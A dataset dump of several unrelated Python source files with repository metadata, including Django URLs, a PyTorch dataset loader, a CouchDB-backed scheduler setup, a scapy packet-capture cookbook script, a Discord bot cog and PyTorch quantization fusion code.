a309e90ac2f88ea56edc2aaeacb9b7f74fba3681
| 591
|
py
|
Python
|
system_test_progress_tracking/progress_tracking/urls.py
|
TobKed/system_test_progress_tracking
|
633792e7057289b6a23db30c6353241123eaa2e4
|
[
"MIT"
] | null | null | null |
system_test_progress_tracking/progress_tracking/urls.py
|
TobKed/system_test_progress_tracking
|
633792e7057289b6a23db30c6353241123eaa2e4
|
[
"MIT"
] | 3
|
2020-02-11T23:29:05.000Z
|
2021-06-10T21:03:42.000Z
|
system_test_progress_tracking/progress_tracking/urls.py
|
TobKed/system_test_progress_tracking
|
633792e7057289b6a23db30c6353241123eaa2e4
|
[
"MIT"
] | 2
|
2019-01-24T20:39:31.000Z
|
2019-01-29T07:42:27.000Z
|
from django.urls import path
from .views import (
home,
MachineDetailView,
MachineListView,
DryRunDataDetailView,
MachineLastDataView,
)
urlpatterns = [
path('', MachineListView.as_view(), name='home-view'),
path('', MachineListView.as_view(), name='machine-list-view'),
path('machine/<int:pk>', MachineDetailView.as_view(), name='machine-detail-view'),
path('machine/<int:pk>/last', MachineLastDataView.as_view(), name='machine-last-data-view'),
path('machine/run_data/<int:pk>', DryRunDataDetailView.as_view(), name='dry-run-data-detail-view'),
]
| 32.833333
| 103
| 0.698816
| 68
| 591
| 5.985294
| 0.352941
| 0.07371
| 0.12285
| 0.125307
| 0.240786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126904
| 591
| 17
| 104
| 34.764706
| 0.78876
| 0
| 0
| 0
| 0
| 0
| 0.258883
| 0.155668
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a30a5b9c466fd79c98aae5b462aff3ba4ea72d40
| 480
|
py
|
Python
|
main.py
|
mrroot5/wall-builder
|
2f0414359080fecdba5312463dd05cd9c11da6c1
|
[
"MIT"
] | null | null | null |
main.py
|
mrroot5/wall-builder
|
2f0414359080fecdba5312463dd05cd9c11da6c1
|
[
"MIT"
] | null | null | null |
main.py
|
mrroot5/wall-builder
|
2f0414359080fecdba5312463dd05cd9c11da6c1
|
[
"MIT"
] | null | null | null |
"""
Python version 3.6.7
OS Linux Ubuntu 18.04.1 LTS
Created: 30/11/2018 17:12
Finished: 30/11/2018 19:
Author: Adrian Garrido Garcia
"""
import sys
from wall.builder import build_a_wall
if __name__ == '__main__':
try:
build_a_wall(sys.argv[1], sys.argv[2])
except IndexError:
rows = input("Please, give me the number of wall rows: ")
bricks = input("Please, give me the number of bricks for every wall row: ")
build_a_wall(rows, bricks)
| 25.263158
| 83
| 0.672917
| 79
| 480
| 3.911392
| 0.64557
| 0.058252
| 0.097087
| 0.110032
| 0.18123
| 0.18123
| 0.18123
| 0
| 0
| 0
| 0
| 0.085106
| 0.216667
| 480
| 18
| 84
| 26.666667
| 0.736702
| 0.26875
| 0
| 0
| 0
| 0
| 0.309038
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a30c417b3a747422a1fa92c8a3a68fa2a0ddf883
| 2,770
|
py
|
Python
|
dataset.py
|
njoel-ethz/saliency-rl
|
61cf7acf10569b04c3a59528a4fc511c6e794895
|
[
"MIT"
] | null | null | null |
dataset.py
|
njoel-ethz/saliency-rl
|
61cf7acf10569b04c3a59528a4fc511c6e794895
|
[
"MIT"
] | null | null | null |
dataset.py
|
njoel-ethz/saliency-rl
|
61cf7acf10569b04c3a59528a4fc511c6e794895
|
[
"MIT"
] | null | null | null |
import os
import csv
import cv2
import numpy as np
import torch
from torch.utils.data import Dataset, DataLoader
def transform(snippet):
''' stack & noralization '''
snippet = np.concatenate(snippet, axis=-1)
snippet = torch.from_numpy(snippet).permute(2, 0, 1).contiguous().float()
snippet = snippet.mul_(2.).sub_(255).div(255)
snippet = snippet.view(-1,3,snippet.size(1),snippet.size(2)).permute(1,0,2,3)
return snippet
class DHF1KDataset(Dataset):
def __init__(self, path_data, len_snippet):
self.path_data = path_data
self.len_snippet = len_snippet
if (path_data == 'DHF1K_dataset'):
path_to_file = 'DHF1K_num_frame_train.csv'#'Atari_num_frame_train.csv', 'r'))]
else:
path_to_file = 'Atari_num_frame_train.csv'
csv_reader = csv.reader(open(path_to_file, 'r'))
list_of_tuples = list(map(tuple, csv_reader)) #list of (#samples, file_name)
num_frame = []
for (n_samples, name) in list_of_tuples:
num_frame.append((int(n_samples), name))
self.list_num_frame = num_frame
def __len__(self):
return len(self.list_num_frame)
def __getitem__(self, idx):
file_name = self.list_num_frame[idx][1]
#file_name = '%04d'%(idx+1)
path_clip = os.path.join(self.path_data, 'video', file_name)
path_annt = os.path.join(self.path_data, 'annotation', file_name, 'maps')
start_idx = np.random.randint(1, self.list_num_frame[idx][0]-self.len_snippet+1) #(0, ..) to keep 1st frame
v = np.random.random()
clip = []
for i in range(self.len_snippet):
img = cv2.imread(os.path.join(path_clip, '%06d.png'%(start_idx+i+1)))
img = cv2.resize(img, (384, 224))
img = img[...,::-1]
if v < 0.5:
img = img[:, ::-1, ...]
clip.append(img)
annt = cv2.imread(os.path.join(path_annt, '%06d.png'%(start_idx+self.len_snippet)), 0)
annt = cv2.resize(annt, (384, 224))
if v < 0.5:
annt = annt[:, ::-1]
return transform(clip), torch.from_numpy(annt.copy()).contiguous().float(), (file_name, '%06d.png'%(start_idx+self.len_snippet))
# from gist.github.com/MFreidank/821cc87b012c53fade03b0c7aba13958
class InfiniteDataLoader(DataLoader):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.dataset_iterator = super().__iter__()
def __iter__(self):
return self
def __next__(self):
try:
batch = next(self.dataset_iterator)
except StopIteration:
self.dataset_iterator = super().__iter__()
batch = next(self.dataset_iterator)
return batch
| 37.432432
| 136
| 0.615884
| 374
| 2,770
| 4.278075
| 0.283422
| 0.05
| 0.04375
| 0.04
| 0.22625
| 0.09125
| 0.035
| 0
| 0
| 0
| 0
| 0.03901
| 0.241155
| 2,770
| 74
| 137
| 37.432432
| 0.722169
| 0.072202
| 0
| 0.1
| 0
| 0
| 0.041813
| 0.019539
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116667
| false
| 0
| 0.1
| 0.033333
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a30d6af902c1a8c64022ae0458cac17dd1fa6032
| 6,398
|
py
|
Python
|
openprocurement/chronograph/__init__.py
|
yshalenyk/openprocurement.chronograph
|
c15a6da519cea8a09b5d9a943752a49dd6f5131f
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/chronograph/__init__.py
|
yshalenyk/openprocurement.chronograph
|
c15a6da519cea8a09b5d9a943752a49dd6f5131f
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/chronograph/__init__.py
|
yshalenyk/openprocurement.chronograph
|
c15a6da519cea8a09b5d9a943752a49dd6f5131f
|
[
"Apache-2.0"
] | null | null | null |
import gevent.monkey
gevent.monkey.patch_all()
import os
from logging import getLogger
#from apscheduler.executors.pool import ThreadPoolExecutor, ProcessPoolExecutor
from apscheduler.schedulers.gevent import GeventScheduler as Scheduler
from couchdb import Server, Session
from couchdb.http import Unauthorized, extract_credentials
from datetime import datetime, timedelta
#from openprocurement.chronograph.jobstores import CouchDBJobStore
from openprocurement.chronograph.design import sync_design
from openprocurement.chronograph.scheduler import push
from openprocurement.chronograph.utils import add_logging_context
from pyramid.config import Configurator
from pytz import timezone
from pyramid.events import ApplicationCreated, ContextFound
from pbkdf2 import PBKDF2
LOGGER = getLogger(__name__)
TZ = timezone(os.environ['TZ'] if 'TZ' in os.environ else 'Europe/Kiev')
SECURITY = {u'admins': {u'names': [], u'roles': ['_admin']}, u'members': {u'names': [], u'roles': ['_admin']}}
VALIDATE_DOC_ID = '_design/_auth'
VALIDATE_DOC_UPDATE = """function(newDoc, oldDoc, userCtx){
if(newDoc._deleted) {
throw({forbidden: 'Not authorized to delete this document'});
}
if(userCtx.roles.indexOf('_admin') !== -1 && newDoc.indexOf('_design/') === 0) {
return;
}
if(userCtx.name === '%s') {
return;
} else {
throw({forbidden: 'Only authorized user may edit the database'});
}
}"""
def start_scheduler(event):
app = event.app
app.registry.scheduler.start()
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
config = Configurator(settings=settings)
config.add_subscriber(add_logging_context, ContextFound)
config.include('pyramid_exclog')
config.add_route('home', '/')
config.add_route('resync_all', '/resync_all')
config.add_route('resync_back', '/resync_back')
config.add_route('resync', '/resync/{tender_id}')
config.add_route('recheck', '/recheck/{tender_id}')
config.add_route('calendar', '/calendar')
config.add_route('calendar_entry', '/calendar/{date}')
config.add_route('streams', '/streams')
config.scan(ignore='openprocurement.chronograph.tests')
config.add_subscriber(start_scheduler, ApplicationCreated)
config.registry.api_token = os.environ.get('API_TOKEN', settings.get('api.token'))
db_name = os.environ.get('DB_NAME', settings['couchdb.db_name'])
server = Server(settings.get('couchdb.url'), session=Session(retry_delays=range(60)))
if 'couchdb.admin_url' not in settings and server.resource.credentials:
try:
server.version()
except Unauthorized:
server = Server(extract_credentials(settings.get('couchdb.url'))[0], session=Session(retry_delays=range(60)))
config.registry.couchdb_server = server
if 'couchdb.admin_url' in settings and server.resource.credentials:
aserver = Server(settings.get('couchdb.admin_url'), session=Session(retry_delays=range(10)))
users_db = aserver['_users']
if SECURITY != users_db.security:
LOGGER.info("Updating users db security", extra={'MESSAGE_ID': 'update_users_security'})
users_db.security = SECURITY
username, password = server.resource.credentials
user_doc = users_db.get('org.couchdb.user:{}'.format(username), {'_id': 'org.couchdb.user:{}'.format(username)})
if not user_doc.get('derived_key', '') or PBKDF2(password, user_doc.get('salt', ''), user_doc.get('iterations', 10)).hexread(int(len(user_doc.get('derived_key', '')) / 2)) != user_doc.get('derived_key', ''):
user_doc.update({
"name": username,
"roles": [],
"type": "user",
"password": password
})
LOGGER.info("Updating chronograph db main user", extra={'MESSAGE_ID': 'update_chronograph_main_user'})
users_db.save(user_doc)
security_users = [username, ]
if db_name not in aserver:
aserver.create(db_name)
db = aserver[db_name]
SECURITY[u'members'][u'names'] = security_users
if SECURITY != db.security:
LOGGER.info("Updating chronograph db security", extra={'MESSAGE_ID': 'update_chronograph_security'})
db.security = SECURITY
auth_doc = db.get(VALIDATE_DOC_ID, {'_id': VALIDATE_DOC_ID})
if auth_doc.get('validate_doc_update') != VALIDATE_DOC_UPDATE % username:
auth_doc['validate_doc_update'] = VALIDATE_DOC_UPDATE % username
LOGGER.info("Updating chronograph db validate doc", extra={'MESSAGE_ID': 'update_chronograph_validate_doc'})
db.save(auth_doc)
# sync couchdb views
sync_design(db)
db = server[db_name]
else:
if db_name not in server:
server.create(db_name)
db = server[db_name]
# sync couchdb views
sync_design(db)
config.registry.db = db
jobstores = {
#'default': CouchDBJobStore(database=db_name, client=server)
}
#executors = {
#'default': ThreadPoolExecutor(5),
#'processpool': ProcessPoolExecutor(5)
#}
job_defaults = {
'coalesce': False,
'max_instances': 3
}
config.registry.api_url = settings.get('api.url')
config.registry.callback_url = settings.get('callback.url')
scheduler = Scheduler(jobstores=jobstores,
#executors=executors,
job_defaults=job_defaults,
timezone=TZ)
if 'jobstore_db' in settings:
scheduler.add_jobstore('sqlalchemy', url=settings['jobstore_db'])
config.registry.scheduler = scheduler
# scheduler.remove_all_jobs()
# scheduler.start()
resync_all_job = scheduler.get_job('resync_all')
now = datetime.now(TZ)
if not resync_all_job or resync_all_job.next_run_time < now - timedelta(hours=1):
if resync_all_job:
args = resync_all_job.args
else:
args = [settings.get('callback.url') + 'resync_all', None]
run_date = now + timedelta(seconds=60)
scheduler.add_job(push, 'date', run_date=run_date, timezone=TZ,
id='resync_all', args=args,
replace_existing=True, misfire_grace_time=60 * 60)
return config.make_wsgi_app()
| 44.124138
| 215
| 0.664739
| 754
| 6,398
| 5.437666
| 0.248011
| 0.016098
| 0.027317
| 0.019512
| 0.194634
| 0.091707
| 0.020488
| 0
| 0
| 0
| 0
| 0.004944
| 0.209597
| 6,398
| 144
| 216
| 44.430556
| 0.805814
| 0.069553
| 0
| 0.065574
| 0
| 0.008197
| 0.22679
| 0.033698
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016393
| false
| 0.02459
| 0.114754
| 0
| 0.139344
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a30f4fc2ab1f50558de3a730d24cdd2bc794f650
| 1,078
|
py
|
Python
|
poc/setmanyblocks.py
|
astro-pi/SpaceCRAFT
|
b577681b31c0554db9e77ed816cd63900fe195ca
|
[
"BSD-3-Clause"
] | 12
|
2016-03-05T16:40:16.000Z
|
2019-10-27T07:48:12.000Z
|
poc/setmanyblocks.py
|
astro-pi/SpaceCRAFT
|
b577681b31c0554db9e77ed816cd63900fe195ca
|
[
"BSD-3-Clause"
] | 1
|
2016-03-03T16:54:59.000Z
|
2016-03-09T12:14:33.000Z
|
poc/setmanyblocks.py
|
astro-pi/SpaceCRAFT
|
b577681b31c0554db9e77ed816cd63900fe195ca
|
[
"BSD-3-Clause"
] | 2
|
2015-12-01T08:01:07.000Z
|
2019-10-27T07:48:19.000Z
|
#code which sends many setBlock commands all in one go, to see if there was
# a performance improvement.. It sent them a lot quicker, but you still had to wait
# for minecraft to catch up
import mcpi.minecraft as minecraft
import mcpi.block as block
import mcpi.util as util
from time import time, sleep
def setManyBlocks(mc, blocks):
mc.conn.drain()
s = ""
for block in blocks:
args = minecraft.intFloor(block)
s += "world.setBlock(%s)\n"%(util.flatten_parameters_to_string(args))
mc.conn.lastSent = s
mc.conn.socket.sendall(s.encode())
mc = minecraft.Minecraft.create()
starttime = time()
blocksToSet = []
for x in range(0,25):
for y in range(25,50):
for z in range(0,25):
blocksToSet.append((x,y,z,block.DIAMOND_BLOCK.id))
endtime = time()
print(endtime - starttime)
setManyBlocks(mc, blocksToSet)
sleep(5)
starttime = time()
for x in range(0,25):
for y in range(25,50):
for z in range(0,25):
mc.setBlock(x,y,z,block.DIRT.id)
endtime = time()
print(endtime - starttime)
| 25.069767
| 83
| 0.666976
| 169
| 1,078
| 4.230769
| 0.443787
| 0.058741
| 0.044755
| 0.055944
| 0.215385
| 0.215385
| 0.12028
| 0.12028
| 0.12028
| 0.12028
| 0
| 0.024852
| 0.216141
| 1,078
| 42
| 84
| 25.666667
| 0.821302
| 0.168831
| 0
| 0.4
| 0
| 0
| 0.022422
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0
| 0.133333
| 0
| 0.166667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3156184194412b6c58e7f98504a56f1d8eea1bf
| 1,132
|
py
|
Python
|
Chapter08/8_2_save_packets_in_pcap_format.py
|
shamir456/Python-Network-Programming-Cookbook-Second-Edition
|
7f5ebcbb4ef79c41da677afdf0d8e0fb575dcf0b
|
[
"MIT"
] | 125
|
2017-08-10T18:09:55.000Z
|
2022-03-29T10:14:31.000Z
|
Chapter08/8_2_save_packets_in_pcap_format.py
|
shamir456/Python-Network-Programming-Cookbook-Second-Edition
|
7f5ebcbb4ef79c41da677afdf0d8e0fb575dcf0b
|
[
"MIT"
] | 4
|
2018-01-19T05:42:58.000Z
|
2019-03-07T06:18:52.000Z
|
Chapter08/8_2_save_packets_in_pcap_format.py
|
shamir456/Python-Network-Programming-Cookbook-Second-Edition
|
7f5ebcbb4ef79c41da677afdf0d8e0fb575dcf0b
|
[
"MIT"
] | 79
|
2017-08-15T00:40:36.000Z
|
2022-02-26T10:20:24.000Z
|
#!/usr/bin/env python
# Python Network Programming Cookbook, Second Edition -- Chapter - 8
# This program is optimized for Python 2.7.12 and Python 3.5.2.
# It may run on any other version with/without modifications.
import os
from scapy.all import *
pkts = []
count = 0
pcapnum = 0
def write_cap(x):
global pkts
global count
global pcapnum
pkts.append(x)
count += 1
if count == 3:
pcapnum += 1
pname = "pcap%d.pcap" % pcapnum
wrpcap(pname, pkts)
pkts = []
count = 0
def test_dump_file():
print ("Testing the dump file...")
dump_file = "./pcap1.pcap"
if os.path.exists(dump_file):
print ("dump fie %s found." %dump_file)
pkts = sniff(offline=dump_file)
count = 0
while (count <=2):
print ("----Dumping pkt:%s----" %count)
print (hexdump(pkts[count]))
count += 1
else:
print ("dump fie %s not found." %dump_file)
if __name__ == '__main__':
print ("Started packet capturing and dumping... Press CTRL+C to exit")
sniff(prn=write_cap)
test_dump_file()
| 24.085106
| 74
| 0.590106
| 155
| 1,132
| 4.187097
| 0.541935
| 0.098613
| 0.030817
| 0.040062
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022305
| 0.287102
| 1,132
| 46
| 75
| 24.608696
| 0.781908
| 0.184629
| 0
| 0.205882
| 0
| 0
| 0.19281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.117647
| 0.176471
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3168c69f4eb9f2ba122306fee2a6890c6f1230e
| 1,621
|
py
|
Python
|
Assignments/Sprint2/FinValuePivot.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | 1
|
2021-02-28T07:43:59.000Z
|
2021-02-28T07:43:59.000Z
|
Assignments/Sprint2/FinValuePivot.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | null | null | null |
Assignments/Sprint2/FinValuePivot.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | 1
|
2021-03-03T03:52:21.000Z
|
2021-03-03T03:52:21.000Z
|
"""
You are given a sorted array in ascending order that is rotated at some unknown pivot
(i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]) and a target value.
Write a function that returns the target value's index. If the target value is not present
in the array, return -1.
You may assume no duplicate exists in the array.
Your algorithm's runtime complexity must be in the order of O(log n).
Example 1:
Input: nums = [4,5,6,7,0,1,2], target = 0
Output: 4
Example 2:
Input: nums = [4,5,6,7,0,1,2], target = 3
"""
def findValueSortedShiftedArray(nums, target):
n = len(nums)
pivot = findPivot(nums, 0, n-1)
if pivot == -1:
return binarySearch(nums, 0, n-1, target)
if nums[pivot] == target:
return pivot
if nums[0] <= target:
return binarySearch(nums, 0, pivot-1, target)
return binarySearch(nums, pivot + 1, n-1, target)
def findPivot(nums, min, max):
min, max = 0, len(nums)
if max < min:
return -1
if max == min:
return min
mid = int((min + max) / 2)
if mid < max and nums[mid] > nums[mid + 1]:
return mid
if mid > min and nums[mid] < nums[mid - 1]:
return (mid - 1)
if nums[min] >= nums[mid]:
return findPivot(nums, mid + 1, max)
def binarySearch(nums, min, max, target):
if max < min:
return -1
mid = int((min + max) / 2)
if target == nums[mid]:
return mid
if target > nums[mid]:
return binarySearch(nums, (mid + 1), max, target)
return binarySearch(nums, min, (mid - 1), target)
| 25.730159
| 91
| 0.58359
| 258
| 1,621
| 3.666667
| 0.267442
| 0.066596
| 0.116279
| 0.016913
| 0.216702
| 0.142706
| 0.110994
| 0.103594
| 0.046512
| 0.046512
| 0
| 0.047743
| 0.289328
| 1,621
| 63
| 92
| 25.730159
| 0.773438
| 0.319556
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09375
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a31d402b111d9ee652386e79f628f7e0ddffa959
| 987
|
py
|
Python
|
utility.py
|
Forthyse/Forsythe-Bot
|
c8871b1fde456403d951a9dde13dddaca2d3f67b
|
[
"MIT"
] | 3
|
2021-01-18T22:10:05.000Z
|
2022-01-07T21:46:34.000Z
|
utility.py
|
Forthyse/Forsythe-Bot
|
c8871b1fde456403d951a9dde13dddaca2d3f67b
|
[
"MIT"
] | null | null | null |
utility.py
|
Forthyse/Forsythe-Bot
|
c8871b1fde456403d951a9dde13dddaca2d3f67b
|
[
"MIT"
] | 2
|
2020-10-21T01:27:34.000Z
|
2021-01-02T23:51:02.000Z
|
import discord
from discord.ext import commands
class utility(commands.Cog):
def __init__(self, client):
self.client = client
@commands.guild_only()
@commands.command(name = "avatar", aliases = ["av", "pic"])
async def avatar(self, ctx, user: discord.User=None):
if user is None:
user = ctx.author
embed = discord.Embed(color=000000, title=f'{user.name}#{user.discriminator}')
embed.set_image(url=user.avatar_url)
await ctx.send(embed=embed)
@commands.guild_only()
@commands.command(name="ping")
@commands.cooldown(2, 3, commands.BucketType.user)
async def ping(self, ctx):
pinging = await ctx.send('Pinging...')
diff = pinging.created_at - ctx.message.created_at
await pinging.edit(content=f'Pong! Latency: {round(diff.total_seconds()*1000)}ms | Websocket: {round(self.client.latency*1000)}ms')
def setup(client):
client.add_cog(utility(client))
| 37.961538
| 140
| 0.64843
| 127
| 987
| 4.944882
| 0.472441
| 0.047771
| 0.05414
| 0.079618
| 0.11465
| 0.11465
| 0
| 0
| 0
| 0
| 0
| 0.020592
| 0.212766
| 987
| 26
| 141
| 37.961538
| 0.787645
| 0
| 0
| 0.090909
| 0
| 0.045455
| 0.163032
| 0.106957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a31f5b674099dd26d6054dab2dbff6ca679ee640
| 8,215
|
py
|
Python
|
torch/ao/quantization/fx/fusion_patterns.py
|
li-ang/pytorch
|
17f3179d607b9a2eac5efdfc36673e89f70e6628
|
[
"Intel"
] | 1
|
2022-02-15T07:07:31.000Z
|
2022-02-15T07:07:31.000Z
|
torch/ao/quantization/fx/fusion_patterns.py
|
xiaozhoushi/pytorch
|
7dba88dfdb414def252531027658afe60409291d
|
[
"Intel"
] | null | null | null |
torch/ao/quantization/fx/fusion_patterns.py
|
xiaozhoushi/pytorch
|
7dba88dfdb414def252531027658afe60409291d
|
[
"Intel"
] | null | null | null |
import torch
from torch.fx.graph import Node
from .pattern_utils import (
register_fusion_pattern,
)
from .utils import _parent_name
from .quantization_types import QuantizerCls, NodePattern, Pattern
from ..fuser_method_mappings import get_fuser_method
from ..fuser_method_mappings import get_fuser_method_new
from abc import ABC, abstractmethod
from typing import Any, Callable, Dict, Optional, Union
from .match_utils import MatchAllNode
# ----------------------------
# Fusion Pattern Registrations
# ----------------------------
# Base Pattern Handler
class FuseHandler(ABC):
""" Base handler class for the fusion patterns
"""
def __init__(self, quantizer: QuantizerCls, node: Node):
pass
@abstractmethod
def fuse(self,
quantizer: QuantizerCls,
load_arg: Callable,
root_node: Node,
matched_node_pattern: NodePattern,
fuse_custom_config_dict: Dict[str, Any],
fuser_method_mapping: Optional[Dict[Pattern, Union[torch.nn.Sequential, Callable]]]) -> Node:
pass
@register_fusion_pattern((torch.nn.ReLU, torch.nn.Conv1d))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.Conv2d))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.Conv3d))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.Conv1d))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.Conv2d))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.Conv3d))
@register_fusion_pattern((torch.nn.BatchNorm1d, torch.nn.Conv1d))
@register_fusion_pattern((torch.nn.BatchNorm2d, torch.nn.Conv2d))
@register_fusion_pattern((torch.nn.BatchNorm3d, torch.nn.Conv3d))
@register_fusion_pattern((torch.nn.ReLU, (torch.nn.BatchNorm1d, torch.nn.Conv1d)))
@register_fusion_pattern((torch.nn.ReLU, (torch.nn.BatchNorm2d, torch.nn.Conv2d)))
@register_fusion_pattern((torch.nn.ReLU, (torch.nn.BatchNorm3d, torch.nn.Conv3d)))
@register_fusion_pattern((torch.nn.functional.relu, (torch.nn.BatchNorm1d, torch.nn.Conv1d)))
@register_fusion_pattern((torch.nn.functional.relu, (torch.nn.BatchNorm2d, torch.nn.Conv2d)))
@register_fusion_pattern((torch.nn.functional.relu, (torch.nn.BatchNorm3d, torch.nn.Conv3d)))
@register_fusion_pattern((torch.nn.BatchNorm1d, torch.nn.Linear))
class ConvOrLinearBNReLUFusion(FuseHandler):
def __init__(self, quantizer: QuantizerCls, node: Node):
super().__init__(quantizer, node)
self.relu_node = None
self.bn_node = None
if (node.op == 'call_function' and node.target is torch.nn.functional.relu) or \
(node.op == 'call_module' and type(quantizer.modules[node.target]) == torch.nn.ReLU):
self.relu_node = node
assert isinstance(node.args[0], Node)
node = node.args[0]
assert node.op == 'call_module'
if type(quantizer.modules[node.target]) in [torch.nn.BatchNorm1d, torch.nn.BatchNorm2d, torch.nn.BatchNorm3d]:
self.bn_node = node
self.bn = quantizer.modules[self.bn_node.target]
assert isinstance(node.args[0], Node)
node = node.args[0]
assert node.op == 'call_module'
self.conv_or_linear_node = node
self.conv_or_linear = quantizer.modules[self.conv_or_linear_node.target]
def fuse(self,
quantizer: QuantizerCls,
load_arg: Callable,
root_node: Node,
matched_node_pattern: NodePattern,
fuse_custom_config_dict: Dict[str, Any],
fuser_method_mapping: Optional[Dict[Pattern, Union[torch.nn.Sequential, Callable]]]) -> Node:
additional_fuser_method_mapping = fuse_custom_config_dict.get("additional_fuser_method_mapping", {})
op_list = []
if self.relu_node is not None:
# since relu can be used multiple times, we'll need to create a relu module for each match
if self.relu_node.op == 'call_module':
relu = torch.nn.ReLU(quantizer.modules[self.relu_node.target].inplace)
else:
# TODO: get inplace argument from functional
relu = torch.nn.ReLU()
op_list.append(relu)
relu.training = self.conv_or_linear.training
if self.bn_node is not None:
op_list.append(self.bn)
op_list.append(self.conv_or_linear)
else:
assert self.bn_node is not None
op_list.append(self.bn)
op_list.append(self.conv_or_linear)
# the modules are added in order of relu - bn - conv_or_linear
# so we need to correct it
op_list.reverse()
op_type_list = tuple(type(m) for m in op_list)
conv_or_linear_parent_name, conv_or_linear_name = _parent_name(self.conv_or_linear_node.target)
fuser_method = get_fuser_method(op_type_list, additional_fuser_method_mapping)
if fuser_method is None:
raise NotImplementedError("Cannot fuse modules: {}".format(op_type_list))
fused = fuser_method(*op_list)
setattr(quantizer.modules[conv_or_linear_parent_name], conv_or_linear_name, fused)
# TODO: do we need to make sure bn is only used once?
if self.bn_node is not None:
parent_name, name = _parent_name(self.bn_node.target)
setattr(quantizer.modules[parent_name], name, torch.nn.Identity())
# relu may be used multiple times, so we don't set relu to identity
return quantizer.fused_graph.node_copy(self.conv_or_linear_node, load_arg)
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.Linear))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.Linear))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.BatchNorm2d))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.BatchNorm2d))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.BatchNorm3d))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.BatchNorm3d))
class ModuleReLUFusion(FuseHandler):
def __init__(
self,
quantizer: QuantizerCls,
node: Node):
super().__init__(quantizer, node)
self.relu_node = node
assert isinstance(node.args[0], Node)
node = node.args[0]
assert node.op == 'call_module'
self.module_node = node
self.module = quantizer.modules[self.module_node.target]
def fuse(self, quantizer: QuantizerCls,
load_arg: Callable,
root_node: Node,
matched_node_pattern: NodePattern,
fuse_custom_config_dict: Dict[str, Any],
